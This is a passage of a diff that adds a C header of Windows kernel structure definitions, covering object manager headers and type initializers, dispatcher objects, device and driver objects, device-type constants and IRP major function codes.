_OBJECT_HANDLE_COUNT_ENTRY {// Size=16 + PVOID Process; // Size=8 Offset=0 + struct + { + unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24 + unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8 + }; +} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY; + +typedef struct _OBJECT_HEADER_HANDLE_INFO // Size=16 +{ + union + { + PVOID HandleCountDataBase; // Size=8 Offset=0 + struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0 + }; +} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO; + +typedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16 + PVOID ExclusiveProcess; // Size=8 Offset=0 + unsigned __int64 Reserved; // Size=8 Offset=8 +} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO; + +typedef struct _OBJECT_HEADER_QUOTA_INFO { + ULONG PagedPoolCharge; //4 + ULONG NonPagedPoolCharge; //4 + ULONG SecurityDescriptorCharge; //4 + PVOID SecurityDescriptorQuotaBlock; //sizeof(pointer) + unsigned __int64 Reserved; //sizeof(uint64) +} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO; + +typedef struct _QUAD { + union + { + INT64 UseThisFieldToCopy; + float DoNotUseThisField; + }; +} QUAD, *PQUAD; + +typedef struct _OBJECT_CREATE_INFORMATION { + ULONG Attributes; + PVOID RootDirectory; + CHAR ProbeMode; + ULONG PagedPoolCharge; + ULONG NonPagedPoolCharge; + ULONG SecurityDescriptorCharge; + PVOID SecurityDescriptor; + PSECURITY_QUALITY_OF_SERVICE SecurityQos; + SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; +} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION; + +typedef enum _POOL_TYPE { + NonPagedPool = 0, + NonPagedPoolExecute = 0, + PagedPool = 1, + NonPagedPoolMustSucceed = 2, + DontUseThisType = 3, + NonPagedPoolCacheAligned = 4, + PagedPoolCacheAligned = 5, + NonPagedPoolCacheAlignedMustS = 6, + MaxPoolType = 7, + NonPagedPoolBase = 0, + NonPagedPoolBaseMustSucceed = 2, + NonPagedPoolBaseCacheAligned = 4, + NonPagedPoolBaseCacheAlignedMustS = 6, + NonPagedPoolSession = 32, + PagedPoolSession = 33, + NonPagedPoolMustSucceedSession = 34, + DontUseThisTypeSession = 35, + NonPagedPoolCacheAlignedSession = 36, + PagedPoolCacheAlignedSession = 37, + NonPagedPoolCacheAlignedMustSSession = 38, + NonPagedPoolNx = 512, + NonPagedPoolNxCacheAligned = 516, + NonPagedPoolSessionNx = 544 +} POOL_TYPE; + +typedef struct _OBJECT_TYPE_INITIALIZER_V1 { + USHORT Length; + BOOLEAN UseDefaultObject; + BOOLEAN Reserved1; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ACCESS_MASK ValidAccessMask; + BOOLEAN SecurityRequired; + BOOLEAN MaintainHandleCount; + BOOLEAN MaintainTypeList; + UCHAR Reserved2; + BOOLEAN PagedPool; + ULONG DefaultPagedPoolCharge; + ULONG DefaultNonPagedPoolCharge; + PVOID DumpProcedure; + PVOID OpenProcedure; + PVOID CloseProcedure; + PVOID DeleteProcedure; + PVOID ParseProcedure; + PVOID SecurityProcedure; + PVOID QueryNameProcedure; + PVOID OkayToCloseProcedure; +} OBJECT_TYPE_INITIALIZER_V1, *POBJECT_TYPE_INITIALIZER_V1; + +typedef struct _OBJECT_TYPE_INITIALIZER_V2 {// Size=120 + USHORT Length; // Size=2 Offset=0 + UCHAR ObjectTypeFlags; // Size=1 Offset=2 + ULONG ObjectTypeCode; // Size=4 Offset=4 + ULONG InvalidAttributes; // Size=4 Offset=8 + GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 + ULONG ValidAccessMask; // Size=4 Offset=28 + ULONG RetainAccess; // Size=4 Offset=32 + POOL_TYPE PoolType; // Size=4 Offset=36 + ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 + ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 + PVOID DumpProcedure; // Size=8 Offset=48 + PVOID OpenProcedure; // Size=8 Offset=56 + PVOID CloseProcedure; // Size=8 Offset=64 + PVOID DeleteProcedure; // Size=8 Offset=72 + PVOID ParseProcedure; // Size=8 Offset=80 + PVOID SecurityProcedure; // Size=8 Offset=88 + PVOID QueryNameProcedure; // Size=8 Offset=96 + PVOID OkayToCloseProcedure; // Size=8 Offset=104 +} OBJECT_TYPE_INITIALIZER_V2, *POBJECT_TYPE_INITIALIZER_V2; + +typedef struct _OBJECT_TYPE_INITIALIZER_V3 {// Size=120 + USHORT Length; // Size=2 Offset=0 + UCHAR ObjectTypeFlags; // Size=1 Offset=2 + ULONG ObjectTypeCode; // Size=4 Offset=4 + ULONG InvalidAttributes; // Size=4 Offset=8 + GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 + ULONG ValidAccessMask; // Size=4 Offset=28 + ULONG RetainAccess; // Size=4 Offset=32 + POOL_TYPE PoolType; // Size=4 Offset=36 + ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 + ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 + PVOID DumpProcedure; // Size=8 Offset=48 + PVOID OpenProcedure; // Size=8 Offset=56 + PVOID CloseProcedure; // Size=8 Offset=64 + PVOID DeleteProcedure; // Size=8 Offset=72 + PVOID ParseProcedure; // Size=8 Offset=80 + PVOID SecurityProcedure; // Size=8 Offset=88 + PVOID QueryNameProcedure; // Size=8 Offset=96 + PVOID OkayToCloseProcedure; // Size=8 Offset=104 + ULONG WaitObjectFlagMask; // Size=4 Offset=112 + USHORT WaitObjectFlagOffset; // Size=2 Offset=116 + USHORT WaitObjectPointerOffset; // Size=2 Offset=118 +} OBJECT_TYPE_INITIALIZER_V3, *POBJECT_TYPE_INITIALIZER_V3; + +typedef struct _OBJECT_TYPE_INITIALIZER {// Size=120 + USHORT Length; // Size=2 Offset=0 + UCHAR ObjectTypeFlags; // Size=1 Offset=2 + ULONG ObjectTypeCode; // Size=4 Offset=4 + ULONG InvalidAttributes; // Size=4 Offset=8 + GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 + ULONG ValidAccessMask; // Size=4 Offset=28 + ULONG RetainAccess; // Size=4 Offset=32 + POOL_TYPE PoolType; // Size=4 Offset=36 + ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 + ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 + PVOID DumpProcedure; // Size=8 Offset=48 + PVOID OpenProcedure; // Size=8 Offset=56 + PVOID CloseProcedure; // Size=8 Offset=64 + PVOID DeleteProcedure; // Size=8 Offset=72 + PVOID ParseProcedure; // Size=8 Offset=80 + PVOID SecurityProcedure; // Size=8 Offset=88 + PVOID QueryNameProcedure; // Size=8 Offset=96 + PVOID OkayToCloseProcedure; // Size=8 Offset=104 +} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER; + +typedef struct _OBJECT_TYPE_V2 {// Size=216 + LIST_ENTRY TypeList; // Size=16 Offset=0 + UNICODE_STRING Name; // Size=16 Offset=16 + PVOID DefaultObject; // Size=8 Offset=32 + UCHAR Index; // Size=1 Offset=40 + ULONG TotalNumberOfObjects; // Size=4 Offset=44 + ULONG TotalNumberOfHandles; // Size=4 Offset=48 + ULONG HighWaterNumberOfObjects; // Size=4 Offset=52 + ULONG HighWaterNumberOfHandles; // Size=4 Offset=56 + OBJECT_TYPE_INITIALIZER_V2 TypeInfo; + EX_PUSH_LOCK TypeLock; + ULONG Key; + LIST_ENTRY CallbackList; +} OBJECT_TYPE_V2, *POBJECT_TYPE_V2; + +typedef struct _OBJECT_TYPE_V3 {// Size=216 + LIST_ENTRY TypeList; // Size=16 Offset=0 + UNICODE_STRING Name; // Size=16 Offset=16 + PVOID DefaultObject; // Size=8 Offset=32 + UCHAR Index; // Size=1 Offset=40 + ULONG TotalNumberOfObjects; // Size=4 Offset=44 + ULONG TotalNumberOfHandles; // Size=4 Offset=48 + ULONG HighWaterNumberOfObjects; // Size=4 Offset=52 + ULONG HighWaterNumberOfHandles; // Size=4 Offset=56 + OBJECT_TYPE_INITIALIZER_V3 TypeInfo; + EX_PUSH_LOCK TypeLock; + ULONG Key; + LIST_ENTRY CallbackList; +} OBJECT_TYPE_V3, *POBJECT_TYPE_V3; + +typedef struct _OBJECT_TYPE_COMPATIBLE { + LIST_ENTRY TypeList; + UNICODE_STRING Name; + PVOID DefaultObject; + UCHAR Index; + ULONG TotalNumberOfObjects; + ULONG TotalNumberOfHandles; + ULONG HighWaterNumberOfObjects; + ULONG HighWaterNumberOfHandles; + OBJECT_TYPE_INITIALIZER_V2 TypeInfo; +} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE; + +/* +** brand new header starting from 6.1 +*/ + +typedef struct _OBJECT_HEADER { + LONG PointerCount; + union + { + LONG HandleCount; + PVOID NextToFree; + }; + EX_PUSH_LOCK Lock; + UCHAR TypeIndex; + UCHAR TraceFlags; + UCHAR InfoMask; + UCHAR Flags; + union + { + POBJECT_CREATE_INFORMATION ObjectCreateInfo; + PVOID QuotaBlockCharged; + }; + PVOID SecurityDescriptor; + QUAD Body; +} OBJECT_HEADER, *POBJECT_HEADER; + +#define OBJECT_TO_OBJECT_HEADER(obj) \ + CONTAINING_RECORD( (obj), OBJECT_HEADER, Body ) + +/* +** OBJECT MANAGER END +*/ + +/* +* WDM START +*/ +#define TIMER_TOLERABLE_DELAY_BITS 6 +#define TIMER_EXPIRED_INDEX_BITS 6 +#define TIMER_PROCESSOR_INDEX_BITS 5 + +typedef struct _DISPATCHER_HEADER { + union { + union { + volatile LONG Lock; + LONG LockNV; + } DUMMYUNIONNAME; + + struct { // Events, Semaphores, Gates, etc. + UCHAR Type; // All (accessible via KOBJECT_TYPE) + UCHAR Signalling; + UCHAR Size; + UCHAR Reserved1; + } DUMMYSTRUCTNAME; + + struct { // Timer + UCHAR TimerType; + union { + UCHAR TimerControlFlags; + struct { + UCHAR Absolute : 1; + UCHAR Wake : 1; + UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS; + } DUMMYSTRUCTNAME; + }; + + UCHAR Hand; + union { + UCHAR TimerMiscFlags; + struct { + +#if !defined(KENCODED_TIMER_PROCESSOR) + + UCHAR Index : TIMER_EXPIRED_INDEX_BITS; + +#else + + UCHAR Index : 1; + UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS; + +#endif + + UCHAR Inserted : 1; + volatile UCHAR Expired : 1; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + } DUMMYSTRUCTNAME2; + + struct { // Timer2 + UCHAR Timer2Type; + union { + UCHAR Timer2Flags; + struct { + UCHAR Timer2Inserted : 1; + UCHAR Timer2Expiring : 1; + UCHAR Timer2CancelPending : 1; + UCHAR Timer2SetPending : 1; + UCHAR Timer2Running : 1; + UCHAR Timer2Disabled : 1; + UCHAR Timer2ReservedFlags : 2; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + + UCHAR Timer2Reserved1; + UCHAR Timer2Reserved2; + } DUMMYSTRUCTNAME3; + + struct { // Queue + UCHAR QueueType; + union { + UCHAR QueueControlFlags; + struct { + UCHAR Abandoned : 1; + UCHAR DisableIncrement : 1; + UCHAR QueueReservedControlFlags : 6; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + + UCHAR QueueSize; + UCHAR QueueReserved; + } DUMMYSTRUCTNAME4; + + struct { // Thread + UCHAR ThreadType; + UCHAR ThreadReserved; + union { + UCHAR ThreadControlFlags; + struct { + UCHAR CycleProfiling : 1; + UCHAR CounterProfiling : 1; + UCHAR GroupScheduling : 1; + UCHAR AffinitySet : 1; + UCHAR ThreadReservedControlFlags : 4; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + + union { + UCHAR DebugActive; + +#if !defined(_X86_) + + struct { + BOOLEAN ActiveDR7 : 1; + BOOLEAN Instrumented : 1; + BOOLEAN Minimal : 1; + BOOLEAN Reserved4 : 3; + BOOLEAN UmsScheduled : 1; + BOOLEAN UmsPrimary : 1; + } DUMMYSTRUCTNAME; + +#endif + + } DUMMYUNIONNAME2; + } DUMMYSTRUCTNAME5; + + struct { // Mutant + UCHAR MutantType; + UCHAR MutantSize; + BOOLEAN DpcActive; + UCHAR MutantReserved; + } DUMMYSTRUCTNAME6; + } DUMMYUNIONNAME; + + LONG SignalState; // Object lock + LIST_ENTRY WaitListHead; // Object lock +} DISPATCHER_HEADER, *PDISPATCHER_HEADER; + +typedef struct _KEVENT { + DISPATCHER_HEADER Header; +} KEVENT, *PKEVENT, *PRKEVENT; + +typedef struct _KMUTANT { + DISPATCHER_HEADER Header; + LIST_ENTRY MutantListEntry; + struct _KTHREAD *OwnerThread; + BOOLEAN Abandoned; + UCHAR ApcDisable; +} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX; + +typedef struct _KSEMAPHORE { + DISPATCHER_HEADER Header; + LONG Limit; +} KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE; + +typedef struct _KTIMER { + DISPATCHER_HEADER Header; + ULARGE_INTEGER DueTime; + LIST_ENTRY TimerListEntry; + struct _KDPC *Dpc; + ULONG Processor; + LONG Period; +} KTIMER, *PKTIMER, *PRKTIMER; + +typedef struct _KDEVICE_QUEUE_ENTRY { + LIST_ENTRY DeviceListEntry; + ULONG SortKey; + BOOLEAN Inserted; +} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY; + +typedef enum _KDPC_IMPORTANCE { + LowImportance, + MediumImportance, + HighImportance +} KDPC_IMPORTANCE; + +typedef struct _KDPC { + union { + ULONG TargetInfoAsUlong; + struct { + UCHAR Type; + UCHAR Importance; + volatile USHORT Number; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + + SINGLE_LIST_ENTRY DpcListEntry; + KAFFINITY ProcessorHistory; + PVOID DeferredRoutine; + PVOID DeferredContext; + PVOID SystemArgument1; + PVOID SystemArgument2; + __volatile PVOID DpcData; +} KDPC, *PKDPC, *PRKDPC; + +typedef struct _WAIT_CONTEXT_BLOCK { + union { + KDEVICE_QUEUE_ENTRY WaitQueueEntry; + struct { + LIST_ENTRY DmaWaitEntry; + ULONG NumberOfChannels; + ULONG SyncCallback : 1; + ULONG DmaContext : 1; + ULONG Reserved : 30; + }; + }; + PVOID DeviceRoutine; + PVOID DeviceContext; + ULONG NumberOfMapRegisters; + PVOID DeviceObject; + PVOID CurrentIrp; + PKDPC BufferChainingDpc; +} WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK; + +#define MAXIMUM_VOLUME_LABEL_LENGTH (32 * sizeof(WCHAR)) // 32 characters + +typedef struct _VPB { + CSHORT Type; + CSHORT Size; + USHORT Flags; + USHORT VolumeLabelLength; // in bytes + struct _DEVICE_OBJECT *DeviceObject; + struct _DEVICE_OBJECT *RealDevice; + ULONG SerialNumber; + ULONG ReferenceCount; + WCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)]; +} VPB, *PVPB; + +typedef struct _KQUEUE { + DISPATCHER_HEADER Header; + LIST_ENTRY EntryListHead; + ULONG CurrentCount; + ULONG MaximumCount; + LIST_ENTRY ThreadListHead; +} KQUEUE, *PKQUEUE; + +typedef struct _KDEVICE_QUEUE { + CSHORT Type; + CSHORT Size; + LIST_ENTRY DeviceListHead; + KSPIN_LOCK Lock; + +#if defined(_AMD64_) + + union { + BOOLEAN Busy; + struct { + LONG64 Reserved : 8; + LONG64 Hint : 56; + }; + }; + +#else + + BOOLEAN Busy; + +#endif + +} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE; + +enum _KOBJECTS { + EventNotificationObject = 0x0, + EventSynchronizationObject = 0x1, + MutantObject = 0x2, + ProcessObject = 0x3, + QueueObject = 0x4, + SemaphoreObject = 0x5, + ThreadObject = 0x6, + GateObject = 0x7, + TimerNotificationObject = 0x8, + TimerSynchronizationObject = 0x9, + Spare2Object = 0xa, + Spare3Object = 0xb, + Spare4Object = 0xc, + Spare5Object = 0xd, + Spare6Object = 0xe, + Spare7Object = 0xf, + Spare8Object = 0x10, + Spare9Object = 0x11, + ApcObject = 0x12, + DpcObject = 0x13, + DeviceQueueObject = 0x14, + EventPairObject = 0x15, + InterruptObject = 0x16, + ProfileObject = 0x17, + ThreadedDpcObject = 0x18, + MaximumKernelObject = 0x19, +}; + +#define DO_VERIFY_VOLUME 0x00000002 // ntddk nthal ntifs wdm +#define DO_BUFFERED_IO 0x00000004 // ntddk nthal ntifs wdm +#define DO_EXCLUSIVE 0x00000008 // ntddk nthal ntifs wdm +#define DO_DIRECT_IO 0x00000010 // ntddk nthal ntifs wdm +#define DO_MAP_IO_BUFFER 0x00000020 // ntddk nthal ntifs wdm +#define DO_DEVICE_HAS_NAME 0x00000040 // ntddk nthal ntifs +#define DO_DEVICE_INITIALIZING 0x00000080 // ntddk nthal ntifs wdm +#define DO_SYSTEM_BOOT_PARTITION 0x00000100 // ntddk nthal ntifs +#define DO_LONG_TERM_REQUESTS 0x00000200 // ntddk nthal ntifs +#define DO_NEVER_LAST_DEVICE 0x00000400 // ntddk nthal ntifs +#define DO_SHUTDOWN_REGISTERED 0x00000800 // ntddk nthal ntifs wdm +#define DO_BUS_ENUMERATED_DEVICE 0x00001000 // ntddk nthal ntifs wdm +#define DO_POWER_PAGABLE 0x00002000 // ntddk nthal ntifs wdm +#define DO_POWER_INRUSH 0x00004000 // ntddk nthal ntifs wdm +#define DO_POWER_NOOP 0x00008000 +#define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs +#define DO_XIP 0x00020000 + +#define FILE_REMOVABLE_MEDIA 0x00000001 +#define FILE_READ_ONLY_DEVICE 0x00000002 +#define FILE_FLOPPY_DISKETTE 0x00000004 +#define FILE_WRITE_ONCE_MEDIA 0x00000008 +#define FILE_REMOTE_DEVICE 0x00000010 +#define FILE_DEVICE_IS_MOUNTED 0x00000020 +#define FILE_VIRTUAL_VOLUME 0x00000040 +#define FILE_AUTOGENERATED_DEVICE_NAME 0x00000080 +#define FILE_DEVICE_SECURE_OPEN 0x00000100 +#define FILE_CHARACTERISTIC_PNP_DEVICE 0x00000800 +#define FILE_CHARACTERISTIC_TS_DEVICE 0x00001000 +#define FILE_CHARACTERISTIC_WEBDAV_DEVICE 0x00002000 +#define FILE_CHARACTERISTIC_CSV 0x00010000 +#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000 +#define FILE_PORTABLE_DEVICE 0x00040000 + +#define FILE_DEVICE_BEEP 0x00000001 +#define FILE_DEVICE_CD_ROM 0x00000002 +#define FILE_DEVICE_CD_ROM_FILE_SYSTEM 0x00000003 +#define FILE_DEVICE_CONTROLLER 0x00000004 +#define FILE_DEVICE_DATALINK 0x00000005 +#define FILE_DEVICE_DFS 0x00000006 +#define FILE_DEVICE_DISK 0x00000007 +#define FILE_DEVICE_DISK_FILE_SYSTEM 0x00000008 +#define FILE_DEVICE_FILE_SYSTEM 0x00000009 +#define FILE_DEVICE_INPORT_PORT 0x0000000a +#define FILE_DEVICE_KEYBOARD 0x0000000b +#define FILE_DEVICE_MAILSLOT 0x0000000c +#define FILE_DEVICE_MIDI_IN 0x0000000d +#define FILE_DEVICE_MIDI_OUT 0x0000000e +#define FILE_DEVICE_MOUSE 0x0000000f +#define FILE_DEVICE_MULTI_UNC_PROVIDER 0x00000010 +#define FILE_DEVICE_NAMED_PIPE 0x00000011 +#define FILE_DEVICE_NETWORK 0x00000012 +#define FILE_DEVICE_NETWORK_BROWSER 0x00000013 +#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014 +#define FILE_DEVICE_NULL 0x00000015 +#define FILE_DEVICE_PARALLEL_PORT 0x00000016 +#define FILE_DEVICE_PHYSICAL_NETCARD 0x00000017 +#define FILE_DEVICE_PRINTER 0x00000018 +#define FILE_DEVICE_SCANNER 0x00000019 +#define FILE_DEVICE_SERIAL_MOUSE_PORT 0x0000001a +#define FILE_DEVICE_SERIAL_PORT 0x0000001b +#define FILE_DEVICE_SCREEN 0x0000001c +#define FILE_DEVICE_SOUND 0x0000001d +#define FILE_DEVICE_STREAMS 0x0000001e +#define FILE_DEVICE_TAPE 0x0000001f +#define FILE_DEVICE_TAPE_FILE_SYSTEM 0x00000020 +#define FILE_DEVICE_TRANSPORT 0x00000021 +#define FILE_DEVICE_UNKNOWN 0x00000022 +#define FILE_DEVICE_VIDEO 0x00000023 +#define FILE_DEVICE_VIRTUAL_DISK 0x00000024 +#define FILE_DEVICE_WAVE_IN 0x00000025 +#define FILE_DEVICE_WAVE_OUT 0x00000026 +#define FILE_DEVICE_8042_PORT 0x00000027 +#define FILE_DEVICE_NETWORK_REDIRECTOR 0x00000028 +#define FILE_DEVICE_BATTERY 0x00000029 +#define FILE_DEVICE_BUS_EXTENDER 0x0000002a +#define FILE_DEVICE_MODEM 0x0000002b +#define FILE_DEVICE_VDM 0x0000002c +#define FILE_DEVICE_MASS_STORAGE 0x0000002d +#define FILE_DEVICE_SMB 0x0000002e +#define FILE_DEVICE_KS 0x0000002f +#define FILE_DEVICE_CHANGER 0x00000030 +#define FILE_DEVICE_SMARTCARD 0x00000031 +#define FILE_DEVICE_ACPI 0x00000032 +#define FILE_DEVICE_DVD 0x00000033 +#define FILE_DEVICE_FULLSCREEN_VIDEO 0x00000034 +#define FILE_DEVICE_DFS_FILE_SYSTEM 0x00000035 +#define FILE_DEVICE_DFS_VOLUME 0x00000036 +#define FILE_DEVICE_SERENUM 0x00000037 +#define FILE_DEVICE_TERMSRV 0x00000038 +#define FILE_DEVICE_KSEC 0x00000039 +#define FILE_DEVICE_FIPS 0x0000003A +#define FILE_DEVICE_INFINIBAND 0x0000003B +#define FILE_DEVICE_VMBUS 0x0000003E +#define FILE_DEVICE_CRYPT_PROVIDER 0x0000003F +#define FILE_DEVICE_WPD 0x00000040 +#define FILE_DEVICE_BLUETOOTH 0x00000041 +#define FILE_DEVICE_MT_COMPOSITE 0x00000042 +#define FILE_DEVICE_MT_TRANSPORT 0x00000043 +#define FILE_DEVICE_BIOMETRIC 0x00000044 +#define FILE_DEVICE_PMI 0x00000045 +#define FILE_DEVICE_EHSTOR 0x00000046 +#define FILE_DEVICE_DEVAPI 0x00000047 +#define FILE_DEVICE_GPIO 0x00000048 +#define FILE_DEVICE_USBEX 0x00000049 +#define FILE_DEVICE_CONSOLE 0x00000050 +#define FILE_DEVICE_NFP 0x00000051 +#define FILE_DEVICE_SYSENV 0x00000052 +#define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053 +#define FILE_DEVICE_POINT_OF_SERVICE 0x00000054 + +#define FILE_BYTE_ALIGNMENT 0x00000000 +#define FILE_WORD_ALIGNMENT 0x00000001 +#define FILE_LONG_ALIGNMENT 0x00000003 +#define FILE_QUAD_ALIGNMENT 0x00000007 +#define FILE_OCTA_ALIGNMENT 0x0000000f +#define FILE_32_BYTE_ALIGNMENT 0x0000001f +#define FILE_64_BYTE_ALIGNMENT 0x0000003f +#define FILE_128_BYTE_ALIGNMENT 0x0000007f +#define FILE_256_BYTE_ALIGNMENT 0x000000ff +#define FILE_512_BYTE_ALIGNMENT 0x000001ff + +#define DPC_NORMAL 0 +#define DPC_THREADED 1 + +typedef struct _DEVICE_OBJECT { + CSHORT Type; + USHORT Size; + LONG ReferenceCount; + struct _DRIVER_OBJECT *DriverObject; + struct _DEVICE_OBJECT *NextDevice; + struct _DEVICE_OBJECT *AttachedDevice; + struct _IRP *CurrentIrp; + PVOID Timer; + ULONG Flags; + ULONG Characteristics; + __volatile PVPB Vpb; + PVOID DeviceExtension; + DEVICE_TYPE DeviceType; + CCHAR StackSize; + union { + LIST_ENTRY ListEntry; + WAIT_CONTEXT_BLOCK Wcb; + } Queue; + ULONG AlignmentRequirement; + KDEVICE_QUEUE DeviceQueue; + KDPC Dpc; + ULONG ActiveThreadCount; + PSECURITY_DESCRIPTOR SecurityDescriptor; + KEVENT DeviceLock; + USHORT SectorSize; + USHORT Spare1; + struct _DEVOBJ_EXTENSION * DeviceObjectExtension; + PVOID Reserved; +} DEVICE_OBJECT, *PDEVICE_OBJECT; + +typedef struct _DEVOBJ_EXTENSION { + + CSHORT Type; + USHORT Size; + + // + // Public part of the DeviceObjectExtension structure + // + + PDEVICE_OBJECT DeviceObject; // owning device object + + // end_ntddk end_nthal end_ntifs end_wdm end_ntosp + + // + // Universal Power Data - all device objects must have this + // + + ULONG PowerFlags; // see ntos\po\pop.h + // WARNING: Access via PO macros + // and with PO locking rules ONLY. + + // + // Pointer to the non-universal power data + // Power data that only some device objects need is stored in the + // device object power extension -> DOPE + // see po.h + // + + struct _DEVICE_OBJECT_POWER_EXTENSION *Dope; + + // + // power state information + // + + // + // Device object extension flags. Protected by the IopDatabaseLock. + // + + ULONG ExtensionFlags; + + // + // PnP manager fields + // + + PVOID DeviceNode; + + // + // AttachedTo is a pointer to the device object that this device + // object is attached to. The attachment chain is now doubly + // linked: this pointer and DeviceObject->AttachedDevice provide the + // linkage. + // + + PDEVICE_OBJECT AttachedTo; + + // + // The next two fields are used to prevent recursion in IoStartNextPacket + // interfaces. + // + + LONG StartIoCount; // Used to keep track of number of pending start ios. + LONG StartIoKey; // Next startio key + ULONG StartIoFlags; // Start Io Flags. Need a separate flag so that it can be accessed without locks + PVPB Vpb; // If not NULL contains the VPB of the mounted volume. + // Set in the filesystem's volume device object. + // This is a reverse VPB pointer. + + // begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp + +} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION; + +typedef struct _FAST_IO_DISPATCH { + ULONG SizeOfFastIoDispatch; + PVOID FastIoCheckIfPossible; + PVOID FastIoRead; + PVOID FastIoWrite; + PVOID FastIoQueryBasicInfo; + PVOID FastIoQueryStandardInfo; + PVOID FastIoLock; + PVOID FastIoUnlockSingle; + PVOID FastIoUnlockAll; + PVOID FastIoUnlockAllByKey; + PVOID FastIoDeviceControl; + PVOID AcquireFileForNtCreateSection; + PVOID ReleaseFileForNtCreateSection; + PVOID FastIoDetachDevice; + PVOID FastIoQueryNetworkOpenInfo; + PVOID AcquireForModWrite; + PVOID MdlRead; + PVOID MdlReadComplete; + PVOID PrepareMdlWrite; + PVOID MdlWriteComplete; + PVOID FastIoReadCompressed; + PVOID FastIoWriteCompressed; + PVOID MdlReadCompleteCompressed; + PVOID MdlWriteCompleteCompressed; + PVOID FastIoQueryOpen; + PVOID ReleaseForModWrite; + PVOID AcquireForCcFlush; + PVOID ReleaseForCcFlush; +} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH; + +#define IO_TYPE_ADAPTER 0x00000001 +#define IO_TYPE_CONTROLLER 0x00000002 +#define IO_TYPE_DEVICE 0x00000003 +#define IO_TYPE_DRIVER 0x00000004 +#define IO_TYPE_FILE 0x00000005 +#define IO_TYPE_IRP 0x00000006 +#define IO_TYPE_MASTER_ADAPTER 0x00000007 +#define IO_TYPE_OPEN_PACKET 0x00000008 +#define IO_TYPE_TIMER 0x00000009 +#define IO_TYPE_VPB 0x0000000a +#define IO_TYPE_ERROR_LOG 0x0000000b +#define IO_TYPE_ERROR_MESSAGE 0x0000000c +#define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d + +#define IRP_MJ_CREATE 0x00 +#define IRP_MJ_CREATE_NAMED_PIPE 0x01 +#define IRP_MJ_CLOSE 0x02 +#define IRP_MJ_READ 0x03 +#define IRP_MJ_WRITE 0x04 +#define IRP_MJ_QUERY_INFORMATION 0x05 +#define IRP_MJ_SET_INFORMATION 0x06 +#define IRP_MJ_QUERY_EA 0x07 +#define IRP_MJ_SET_EA 0x08 +#define IRP_MJ_FLUSH_BUFFERS 0x09 +#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a +#define IRP_MJ_SET_VOLUME_INFORMATION 0x0b +#define IRP_MJ_DIRECTORY_CONTROL 0x0c +#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d +#define IRP_MJ_DEVICE_CONTROL 0x0e +#define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f +#define IRP_MJ_SHUTDOWN 0x10 +#define IRP_MJ_LOCK_CONTROL 0x11 +#define IRP_MJ_CLEANUP 0x12 +#define IRP_MJ_CREATE_MAILSLOT 0x13 +#define IRP_MJ_QUERY_SECURITY 0x14 +#define IRP_MJ_SET_SECURITY 0x15 +#define IRP_MJ_POWER 0x16 +#define IRP_MJ_SYSTEM_CONTROL 0x17 +#define IRP_MJ_DEVICE_CHANGE 0x18 +#define IRP_MJ_QUERY_QUOTA 0x19 +#define IRP_MJ_SET_QUOTA 0x1a +#define IRP_MJ_PNP 0x1b +#define IRP_MJ_PNP_POWER IRP_MJ_PNP +#define IRP_MJ_MAXIMUM_FUNCTION 0x1b + +typedef struct _DRIVER_EXTENSION { + + // + // Back pointer to Driver Object + // + + struct _DRIVER_OBJECT *DriverObject; + + // + // The AddDevice entry point is called by the Plug & Play manager + // to inform the driver when a new device instance arrives that this + // driver must control. + // + + PVOID AddDevice; + + // + // The count field is used to count the number of times the driver has + // had its registered reinitialization routine invoked. + // + + ULONG Count; + + // + // The service name field is used by the pnp manager to determine + // where the driver related info is stored in the registry. + // + + UNICODE_STRING ServiceKeyName; + +} DRIVER_EXTENSION, *PDRIVER_EXTENSION; + +#define DRVO_UNLOAD_INVOKED 0x00000001 +#define 